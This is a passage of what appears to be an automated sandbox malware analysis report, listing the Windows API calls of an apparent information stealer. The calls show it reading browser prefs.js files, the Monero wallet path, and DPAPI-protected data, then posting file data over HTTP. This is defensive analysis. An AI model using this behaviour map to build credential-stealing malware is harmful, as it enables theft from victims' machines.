                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401AFE
                                                                                            • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00422366), ref: 00401B85
                                                                                            • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                          • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                            • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                            • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$H_prolog$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                          • String ID: 7$\*.*
                                                                                          • API String ID: 1164748634-4165053604
                                                                                          • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                          • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                          • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                          • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                          Function 0040B463 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040B468
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                                          • StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                                          • StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B6C6
                                                                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                          • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                          • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                          • String ID: prefs.js
                                                                                          • API String ID: 2318033617-3783873740
                                                                                          • Opcode ID: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                          • Instruction ID: ee987ab292ce5c8f0602a9b5561e4dc2d57f8a603593be12f89c118a2121006c
                                                                                          • Opcode Fuzzy Hash: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                          • Instruction Fuzzy Hash: D5D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB785B4CCB66
                                                                                          Function 004094E5 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004094EA
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425DC4,?,?,00425BA2,?), ref: 00409567
                                                                                          • StrCmpCA.SHLWAPI(?,00425DC8), ref: 00409584
                                                                                          • StrCmpCA.SHLWAPI(?,00425DCC), ref: 0040959E
                                                                                          • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425DD0,?,?,00425BA3), ref: 00409635
                                                                                          • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                            • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408841
                                                                                          • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                          • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 322284088-0
                                                                                          • Opcode ID: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                          • Instruction ID: 4c01649d4d81a67c5449674785cae23a0a495e6994ebb05e8901edf346d892d0
                                                                                          • Opcode Fuzzy Hash: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                          • Instruction Fuzzy Hash: 23C17270900249EADF10EBA5C9167DDBFB8AF09304F10417EE844B36C2DB785B08CBA6
                                                                                          Function 004111BE Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004111C3
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                          • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 186290926-0
                                                                                          • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                          • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                          • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                          • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                          Function 00401000 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                          • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401056
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3466090806-0
                                                                                          • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                          • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                          • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                          • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                          Function 004062A5 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                          • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                          • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 2068576380-0
                                                                                          • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                          • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                                          • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                          • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50
                                                                                          Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764stringnetworkmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 29 4043ad-4044ac _EH_prolog call 40f95a call 403a54 call 410dac call 40fb4d lstrlenA call 40fb4d call 410dac call 40f923 * 5 StrCmpCA 52 4044ae 29->52 53 4044af-4044b4 29->53 52->53 54 4044d4-4045f4 call 410b5c call 40fa28 call 40f9e1 call 40f98e * 2 call 40fa9c call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 3 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 2 InternetConnectA 53->54 55 4044b6-4044ce call 40fb4d InternetOpenA 53->55 60 404cf2-404d2f call 410a94 * 2 call 40fb14 * 4 call 40f95a 54->60 125 4045fa-40462d HttpOpenRequestA 54->125 55->54 55->60 89 404d34-404db7 call 40f98e * 9 60->89 126 404633-404635 125->126 127 404ce9-404cec InternetCloseHandle 125->127 128 404637-404647 InternetSetOptionA 126->128 129 40464d-404c3f call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 4020f3 call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa28 call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fa9c call 40f9e1 call 40f98e call 40fb4d lstrlenA call 40fb4d lstrlenA GetProcessHeap HeapAlloc call 40fb4d lstrlenA call 40fb4d memcpy call 40fb4d lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d * 2 lstrlenA memcpy call 40fb4d lstrlenA call 40fb4d HttpSendRequestA call 410a94 HttpQueryInfoA 126->129 127->60 128->129 334 404c41-404c4e call 40f923 129->334 335 404c53-404c65 call 410a77 129->335 334->89 340 404db8-404dc5 call 40f923 335->340 341 404c6b-404c70 335->341 340->89 343 404cac-404cc1 InternetReadFile 341->343 345 404c72-404c77 343->345 346 404cc3-404cd9 call 40fb4d StrCmpCA 343->346 345->346 347 404c79-404ca7 call 40fa9c call 40f9e1 call 40f98e 345->347 352 404ce2-404ce3 InternetCloseHandle 346->352 353 404cdb-404cdc ExitProcess 346->353 347->343 352->127
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004043B2
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                            • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                            • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                            • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                            • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                            • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A40,00000000,?,?,00000000), ref: 00404B42
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                          • memcpy.MSVCRT ref: 00404B92
                                                                                          • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                          • memcpy.MSVCRT ref: 00404BB3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                          • memcpy.MSVCRT ref: 00404BEA
                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                          • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                          • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
